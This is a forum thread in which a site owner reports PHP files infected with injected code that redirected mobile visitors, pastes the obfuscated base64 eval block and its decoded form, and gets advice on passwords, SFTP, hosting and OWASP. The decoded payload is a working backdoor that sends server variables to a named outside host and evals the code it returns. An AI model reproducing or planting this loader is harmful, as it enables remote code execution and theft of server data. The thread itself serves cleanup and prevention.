how to prevent from base64 attacks ?

ugurpc

at one of our sites i found a bad code at the top of index.php, main.php files of nearly all scripts (calendars,gallery scripts, file uploding forms .. etc.)
i wrote this bad code to the below, and this code was redirecting especially mobile viewers to a porn site.
I cleaned those codes from about 25 files but i am in doubt whether it comes back again or not.

Most of our scripts seem to be updated to latest versions, What can i do for better security, we dont want this to happen again.
what can you offer and what is the reason of that hacking ? please give me info ..

the code that i cleaned :

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGhrdWhfYikgeyBnbG9iYWwgJGhrdWhfYjsgJGhrdWhfYiA9IDE7CiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRnaGZqdSA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgImJvdCIsICJzcGlkIiwgIkx5bngiLCAiUEhQIiwgIldvcmRQcmVzcyIuICJpbnRlZ3JvbWVkYiIsIlNJU1RSSVgiLCJBZ2dyZWdhdG9yIiwgImZpbmRsaW5rcyIsICJYZW51IiwgIkJhY2tsaW5rQ3Jhd2xlciIsICJTY2hlZHVsZXIiLCAibW9kX3BhZ2VzcGVlZCIsICJJbmRleCIsICJhaG9vIiwgIlRhcGF0YWxrIiwgIlB1YlN1YiIsICJSU1MiKTsKaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgIShAJF9DT09LSUVbJ3N0YXRzbGUnXSkgYW5kICgocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJGdoZmp1KSAuICIvaSIsICRia2xqZykpIG9yIChAJF9DT09LSUVbJ3N0YXRzbCddKSAgb3IgKCEkYmtsamcpIG9yICgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gPT09ICJodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAiMTI3LjAuMC4xIikgIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pIG9yICgkX0dFVFsnZGYnXSA9PT0gIjEiKSBvciAoJF9QT1NUWydkbCddID09PSAiMSIgKSAgb3IgKGluaV9nZXQoInNhZmVfbW9kZSIpKSBvciAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSkgb3IgKCFmdW5jdGlvbl9leGlzdHMoJ29iX3N0YXJ0JykpKSkKe30KZWxzZQp7CmZvcmVhY2goJF9TRVJWRVIgYXMgJG5kYnYgPT4gJGNiY2QpIHsgJGRhdGFfbmZkaC49ICImUkVNXyIuJG5kYnYuIj0nIi5iYXNlNjRfZW5jb2RlKCRjYmNkKS4iJyI7fQokY29udGV4dF9qaGtiID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKAphcnJheSgnaHR0cCc9PmFycmF5KAogICAgICAgICAgICAgICAgICAgICAgICAndGltZW91dCcgPT4gJzE1JywKICAgICAgICAgICAgICAgICAgICAgICAgJ2hlYWRlcicgPT4gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IGk2ODY7IHJ2OjEwLjAuOSkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMC4wLjlfIEljZXdlYXNlbC8xMC4wLjlcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIsCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywKICAgICAgICAgICAgICAgICAgICAgICAgJ2NvbnRlbnQnID0+ICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaAopKSk7CiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vZ2FsZXJpYS5iYW5hc3play5pbmZvL3BsdWdpbnMvZmx2cGxheWVyL3Nlc3Npb24ucGhwP2lkIiwgZmFsc2UgLCRjb250ZXh0X2poa2IpOwppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgic3RhdHNsIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdzdGF0c2w9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*68066*/ ?>

ugurpc

i decoded the bad code from an online decoding source. it is as follows :
maybe it helps for answering my questions above better.
I wonder if there may be any other file at the server that puts this bad code to our php files., if yes how can i find it ?
the site is a big site.
Thanks

decoded codes :

error_reporting(0);
if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )  or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
                        'timeout' => '15',
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                        'method' => 'POST',
                        'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}
}

NogDog

The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site, that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult to hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) are via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even move to a different host. There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-part apps have the latest security patches!).

Weedpacket

The OWASP project provides a lot of material for helping secure web sites, including descriptions of vulnerabilities a site might have and the attacks that exploit them; they also include a 3-yearly assessment of the top ten risks facing current web applications (including a specific section for PHP.

Derokorian

Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do. 🙂

ugurpc

Thank you for answers and the valuable info you posted. nogdog and weedpacket

Weedpacket

ugurpc wrote:
i decoded the bad code from an online decoding source. it is as follows :

Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: [man]base64_decode[/man].